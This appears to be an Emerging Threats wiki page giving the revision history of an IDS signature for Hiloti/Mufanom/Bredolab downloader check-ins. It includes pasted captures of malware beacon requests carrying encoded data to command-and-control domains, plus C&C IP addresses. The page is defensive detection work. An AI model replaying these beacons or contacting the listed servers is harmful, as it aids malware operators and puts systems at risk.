alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET TROJAN Hiloti/Mufanom Downloader Checkin"; flow:established,to_server; content:"/get"; nocase; http_uri; content:".php?c="; nocase; http_uri; content:"&d="; http_uri; nocase; pcre:"/\/get\d*\.php\?c=[A-Z]{8}&d=[0-9A-F]{250,}$/U"; flowbits:set,ET.Hiloti; reference:url,www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Trojan%3aWin32%2fHiloti.gen!A; reference:url,doc.emergingthreats.net/2010071; reference:url,blog.fortinet.com/hiloti-the-botmaster-of-disguise/; classtype:trojan-activity; sid:2010071; rev:9; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Added 2017-08-07 21:03:11 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Hiloti/Mufanom Downloader Checkin"; flow:established,to_server; content:"/get"; nocase; http_uri; content:".php?c="; nocase; http_uri; content:"&d="; http_uri; nocase; pcre:"/\/get\d*\.php\?c=[A-Z]{8}&d=[0-9A-F]{250,}$/U"; reference:url,www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Trojan%3aWin32%2fHiloti.gen!A; reference:url,doc.emergingthreats.net/2010071; reference:url,blog.fortinet.com/hiloti-the-botmaster-of-disguise/; classtype:trojan-activity; sid:2010071; rev:7;)

Added 2011-10-12 19:28:54 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Hiloti/Mufanom Downloader Checkin"; flow:established,to_server; content:"/get"; nocase; http_uri; content:".php?c="; nocase; http_uri; content:"&d="; http_uri; nocase; pcre:"/\/get\d*\.php\?c=[A-Z]{8}&d=[0-9A-F]{250,}$/U"; classtype:trojan-activity; reference:url,www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Trojan%3aWin32%2fHiloti.gen!A; reference:url,doc.emergingthreats.net/2010071; reference:url,blog.fortinet.com/hiloti-the-botmaster-of-disguise/; sid:2010071; rev:7;)

Added 2011-09-14 22:42:10 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Hiloti/Mufanom Downloader Checkin"; flow:established,to_server; content:"/get"; nocase; http_uri; content:".php?c="; nocase; http_uri; content:"&d="; http_uri; nocase; pcre:"/\/get\d*\.php\?c=[A-Z]{8}&d=[0-9A-F]{250,}$/U"; classtype:trojan-activity; reference:url,www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Trojan%3aWin32%2fHiloti.gen!A; reference:url,doc.emergingthreats.net/2010071; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bredolab; reference:url,blog.fortinet.com/hiloti-the-botmaster-of-disguise/; sid:2010071; rev:7;)

Added 2011-02-04 17:29:31 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Hiloti/Mufanom Downloader Checkin"; flow:established,to_server; uricontent:"/get.php?c="; nocase; uricontent:"&d="; nocase; pcre:"/\/get\.php\?c=[A-Z]{8}&d=[0-9A-F]{250,}$/U"; classtype:trojan-activity; reference:url,www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Trojan%3aWin32%2fHiloti.gen!A; reference:url,doc.emergingthreats.net/2010071; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bredolab; sid:2010071; rev:5;)

Added 2010-02-08 10:55:54 UTC

Resolves to these C&C sites:

78.41.206.236 94.75.221.72

GET /get.php?c=OWTZUQNY&d=26606B673937206A616D37783C3F3F382026222A32607F732528595E5E2F265C12131A6113111613691169686E146B19037474030C010471001F5852524B5B4D7D79746525212B7A796F25383A283C72657F6375203C353C65696A6B6B6B6C6D56545445140C025A58085B5B4A1D1C00134C370B041919051D0B543E24385813E4F3DDE6B9B4A0E4E4E7FED4E9B0BFA9E7A7A6AEA4B3F0AAA9BFE8A6ADBBFDF1C4CD9FCFCDCBC2C6F7C1CBC5C5CACFC19EDCD7D7DDD6D7DBD7DDDDDECF93DDD0ADE7878C96 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 161007da0206.kathell.com
Cache-Control: no-cache

GET /get.php?c=OWTZUQNY&d=26606B673937206A616D37783C3F3F382026222A32607F732528595E5E2F265C12131A6113111613691169686E146B19037474030C010471001F5852524B5B4D7D79746525212B7A796F25383A283C72657F6375203C353C65696A6B646A6E6E52575745140C025A58085B5B4A1D1C00134C370B041919051D0B543E24385813E4F3DDE6B9B4A0E4E4E7FED4E9B0BFA9E7A7A6AEA4B3F5F9FCF5A7F7F5F3FAFEFFC9C3CDCDC2C7C986C4CFCFC5CECFC3DFD5D5D6C79BD5D8D59FFFF4EE HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 161007da0218.pereet.com
Cache-Control: no-cache

GET /get.php?c=OWTZUQNY&d=26606B673937206A616D37783C3F3F382026222A32607F732528595E5E2F265C12131A6113111613691169686E146B19037474030C010471001F5852524B5B4D7D79746525212B7A796F25383A283C72657F6375203C353C65696A6A646B6D6A57525645140C025A58085B5B4A1D1C00134C370B041919051D0B543E24385813E4F3DDE6B9B4A0E4E4E7FED4E9B0BFA9E7A7A6AEA4B3F5F9FCF5A7F7F5F3FAFEFFC9C3CDCDC2C7C986C4CFCFC5CECFC3DFD5D5D6C79BD5D8D59FFFF4EE HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 191007da020a.pereet.com
Cache-Control: no-cache

GET /get.php?c=OWTZUQNY&d=26606B673937206A616D37783C3F3F382026222A32607F732528595E5E2F265C12131A6113111613691169686E146B19037474030C010471001F5852524B5B4D7D79746525212B7A796F25383A283C72657F6375203C353C65696A69656E6E6952595345140C025A58085B5B4A1D1C00134C370B041919051D0B543E24385813E4F3DDE6B9B4A0E4E4E7FED4E9B0BFA9E7A7A6AEA4B3F5F9FCF5A7F7F5F3FAFEFFC9C3CDCDC2C7C986C4CFCFC5CECFC3DFD5D5D6C79BD5D8D59FFFF4EE HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 221007da0208.pereet.com
Cache-Control: no-cache

GET /get.php?c=OWTZUQNY&d=26606B673937206A616D37783C3F3F382026222A32607F732528595E5E2F265C12131A6113111613691169686E146B19037474030C010471001F5852524B5B4D7D79746525212B7A796F25383A283C72657F6375203C353C65696A6B6C6D6B6856555245140C025A58500F534A1D1C00134C370B041919051D0B543E24385813E4F3DDE6B9B4A0E4E4E7FED4E9B0BFA9E7A7A6AEA4B3F5F9FCF5A7BDD9D2CC HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 141707da020a.pereet.com
Cache-Control: no-cache

GET /get.php?c=OWTZUQNY&d=26606B673937206A616D37783C3F3F382026222A32607F732528595E5E2F265C12131A6113111613691169686E146B19037474030C010471001F5852524B5B4D7D79746525212B7A796F25383A283C72657F6375203C353C65696A6B6C6D686B56565345140C025A58500F534A1D1C00134C370B041919051D0B543E24385813E4F3DDE6B9B4A0E4E4E7FED4E9B0BFA9E7A7A6AEA4B3F0AAA9BFE8A6ADBBFDF1C4CD9FCFCDCBC2C6F7C1CBC5C5CACFC19EDCD7D7DDD6D7DBD7DDDDDECF93DDD0ADE7878C96 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 141707da020a.kathell.com
Cache-Control: no-cache

GET /feed.php?ref=http:%2F%2Fwww.bing.com%2Fsearch%3Fq=christopher+and+banks%26form=MSNH14%26qs=AS&ip=75.52.157.550&txt=1 HTTP/1.1
Authorization: Basic 26606B673937206A616D37783C3F3F382026222A32607F732528595E5E2F265C12131A6113111613691169686E146B19037474030C010471001F5852524B5B4D7D79746525212B7A796F25383A283C72657F6375203C353C65696A6B686A6A6952525645140C025A58500F534A1D1C00134C370B041919051D0B543E24385813E4F3DDE6B9B4A0E4E4E7FED4E9B0BFA9E7A7A6AEA4B3D3D8CA
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: u4od.gabverse.net
Cache-Control: no-cache

GET /get.php?c=OWTZUQNY&d=26606B673937206A616D37783C3F3F382026222A32607F732528595E5E2F265C12131A6113111613691169686E146B19037474030C010471001F5852524B5B4D7D79746525212B7A796F25383A283C72657F6375203C353C65696A6B6B6A6C6F57575745140C025A58500F534A1D1C00134C370B041919051D0B543E24385813E4F3DDE6B9B4A0E4E4E7FED4E9B0BFA9E7A7A6AEA4B3F5F9FCF5A7F7F5F3FAFEFFC9C3CDCDC2C7C986C4CFCFC5CECFC3DFD5D5D6C79BD5D8D59FFFF4EE HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 161707da0212.pereet.com
Cache-Control: no-cache

GET /get.php?c=OWTZUQNY&d=26606B673937206A616D37783C3F3F382026222A32607F732528595E5E2F265C12131A6113111613691169686E146B19037474030C010471001F5852524B5B4D7D79746525212B7A796F25383A283C72657F6375203C353C65696A6A6B6B6B6A53545B45140C025A58500F534A1D1C00134C370B041919051D0B543E24385813E4F3DDE6B9B4A0E4E4E7FED4E9B0BFA9E7A7A6AEA4B3F5F9FCF5A7F7F5F3FAFEFFC9C3CDCDC2C7C986C4CFCFC5CECFC3DFD5D5D6C79BD5D8D59FFFF4EE HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 191707da0203.pereet.com
Cache-Control: no-cache

GET /get.php?c=OWTZUQNY&d=26606B673937206A616D37783C3F3F382026222A32607F732528595E5E2F265C12131A6113111613691169686E146B19037474030C010471001F5852524B5B4D7D79746525212B7A796F25383A283C72657F6375203C353C65696A696865686757515145140C025A58500F534A1D1C00134C370B041919051D0B543E24385813E4F3DDE6B9B4A0E4E4E7FED4E9B0BFA9E7A7A6AEA4B3F5F9FCF5A7F7F5F3FAFEFFC9C3CDCDC2C7C986C4CFCFC5CECFC3DFD5D5D6C79BD5D8D59FFFF4EE HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 211707da0203.pereet.com
Cache-Control: no-cache

GET /get.php?c=OWTZUQNY&d=26606B673937206A616D37783C3F3F382026222A32607F732528595E5E2F265C12131A6113111613691169686E146B19037474030C010471001F5852524B5B4D7D79746525212B7A796F25383A283C72657F6375203C353C65696A6B6C6F6D6652575745140C025A580A585F4A1D1C00134C370B041919051D0B543E24385813E4F3DDE6B9B4A0E4E4E7FED4E9B0BFA9E7A7A6AEA4B3F5F9FCF5A7BDD9D2CC HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 141807da020c.pereet.com
Cache-Control: no-cache

GET /get.php?c=OWTZUQNY&d=26606B673937206A616D37783C3F3F382026222A32607F732528595E5E2F265C12131A6113111613691169686E146B19037474030C010471001F5852524B5B4D7D79746525212B7A796F25383A283C72657F6375203C353C65696A6B6C6F6A6A56595545140C025A580A585F4A1D1C00134C370B041919051D0B543E24385813E4F3DDE6B9B4A0E4E4E7FED4E9B0BFA9E7A7A6AEA4B3F0AAA9BFE8A6ADBBFDF1C4CD9FCFCDCBC2C6F7C1CBC5C5CACFC19EDCD7D7DDD6D7DBD7DDDDDECF93DDD0ADE7878C96 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 141807da020c.kathell.com
Cache-Control: no-cache

GET /get.php?c=OWTZUQNY&d=26606B673937206A616D37783C3F3F382026222A32607F732528595E5E2F265C12131A6113111613691169686E146B19037474030C010471001F5852524B5B4D7D79746525212B7A796F25383A283C72657F6375203C353C65696A6B6B68696B58545B45140C025A580A585F4A1D1C00134C370B041919051D0B543E24385813E4F3DDE6B9B4A0E4E4E7FED4E9B0BFA9E7A7A6AEA4B3F5F9FCF5A7F7F5F3FAFEFFC9C3CDCDC2C7C986C4CFCFC5CECFC3DFD5D5D6C79BD5D8D59FFFF4EE HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 161807da020f.pereet.com
Cache-Control: no-cache

GET /get.php?c=OWTZUQNY&d=26606B673937206A616D37783C3F3F382026222A32607F732528595E5E2F265C12131A6113111613691169686E146B19037474030C010471001F5852524B5B4D7D79746525212B7A796F25383A283C72657F6375203C353C65696A6B6C6D686D56515B45140C025A58510B5B4A1D1C00134C370B041919051D0B543E24385813E4F3DDE6B9B4A0E4E4E7FED4E9B0BFA9E7A7A6AEA4B3F0AAA9BFE8A6ADBBFDF1C4CD9F85E1EAF4 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 171807da0213.kathell.com
Cache-Control: no-cache

GET /get.php?c=OWTZUQNY&d=26606B673937206A616D37783C3F3F382026222A32607F732528595E5E2F265C12131A6113111613691169686E146B19037474030C010471001F5852524B5B4D7D79746525212B7A796F25383A283C72657F6375203C353C65696A6B6A6D6C6652585445140C025A58510B5B4A1D1C00134C370B041919051D0B543E24385813E4F3DDE6B9B4A0E4E4E7FED4E9B0BFA9E7A7A6AEA4B3F5F9FCF5A7F7F5F3FAFEFFC9C3CDCDC2C7C986C4CFCFC5CECFC3DFD5D5D6C79BD5D8D59FFFF4EE HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 181807da023b.pereet.com
Cache-Control: no-cache

GET /get.php?c=OWTZUQNY&d=26606B673937206A616D37783C3F3F382026222A32607F732528595E5E2F265C12131A6113111613691169686E146B19037474030C010471001F5852524B5B4D7D79746525212B7A796F25383A283C72657F6375203C353C65696A6A6F696D6E52515145140C025A58510B5B4A1D1C00134C370B041919051D0B543E24385813E4F3DDE6B9B4A0E4E4E7FED4E9B0BFA9E7A7A6AEA4B3F5F9FCF5A7F7F5F3FAFEFFC9C3CDCDC2C7C986C4CFCFC5CECFC3DFD5D5D6C79BD5D8D59FFFF4EE HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 211807da0202.pereet.com
Cache-Control: no-cache

-- JackPepper - 19 Feb 2010


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Hiloti/Mufanom Downloader Checkin"; flow:established,to_server; uricontent:"/get.php?c="; nocase; uricontent:"&d="; nocase; pcre:"/\/get\.php\?c=[A-Z]{8}&d=[0-9A-F]{250,}$/U"; classtype:trojan-activity; reference:url,www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Trojan%3aWin32%2fHiloti.gen!A; reference:url,doc.emergingthreats.net/2010071; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bredolab; sid:2010071; rev:5;)

Added 2010-02-08 10:55:54 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Hiloti/Mufanom Downloader Checkin"; flow:established,to_server; uricontent:"/get.php?c="; nocase; uricontent:"&d="; nocase; pcre:"/\/get\.php\?c=[A-Z]{8}&d=[0-9A-F]{250,}$/U"; classtype:trojan-activity; reference:url,www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Trojan%3aWin32%2fHiloti.gen!A; reference:url,doc.emergingthreats.net/2010071; sid:2010071; rev:4;)

Added 2010-02-08 10:47:13 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Hiloti/Mufanom Downloader Checkin"; flow:established,to_server; uricontent:"/get.php?c="; nocase; uricontent:"&d="; nocase; pcre:"/\/get\.php\?c=[A-Z]{8}&d=[0-9A-F]{250,}$/U"; classtype:trojan-activity; reference:url,www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Trojan%3aWin32%2fHiloti.gen!A; reference:url,doc.emergingthreats.net/2010071; sid:2010071; rev:4;)

Added 2010-02-08 10:47:13 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Hiloti/Mufanom Infection Checkin"; flow:established,to_server; uricontent:"/get.php?c="; nocase; uricontent:"&d="; nocase; pcre:"/\/get\.php\?c=[A-Z]{8}&d=[0-9A-F]{250,}$/U"; classtype:trojan-activity; reference:url,www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Trojan%3aWin32%2fHiloti.gen!A; reference:url,doc.emergingthreats.net/2010071; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bredolab; sid:2010071; rev:3;)

Added 2010-02-05 09:31:11 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Hiloti/Mufanom Infection Checkin"; flow:established,to_server; uricontent:"/get.php?c="; nocase; uricontent:"&d="; nocase; pcre:"/\/get\.php\?c=[A-Z]{8}&d=[0-9A-F]{250,}$/U"; classtype:trojan-activity; reference:url,www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Trojan%3aWin32%2fHiloti.gen!A; reference:url,doc.emergingthreats.net/2010071; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bredolab; sid:2010071; rev:3;)

Added 2010-02-05 09:31:11 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Bredolab Infection - checkin"; flow:established,to_server; uricontent:"/get.php?"; nocase; uricontent:"c="; nocase; uricontent:"&d="; nocase; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2010071; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bredolab; sid:2010071; rev:2;)

Added 2009-10-12 20:45:37 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Bredolab Infection - checkin"; flow:established,to_server; uricontent:"/get.php?"; nocase; uricontent:"c="; nocase; uricontent:"&d="; nocase; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2010071; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bredolab; sid:2010071; rev:2;)

Added 2009-10-12 20:45:37 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Bredolab Infection - checkin"; flow:established,to_server; uricontent:"/get.php?"; nocase; uricontent:"c="; nocase; uricontent:"&d="; nocase; classtype:trojan-activity; sid:2010071; rev:1;)

Added 2009-10-09 08:15:38 UTC


Topic revision: r2 - 2010-02-19 - JackPepper
 
This site is powered by the TWiki collaboration platform Powered by Perl This site is powered by the TWiki collaboration platformCopyright © Emerging Threats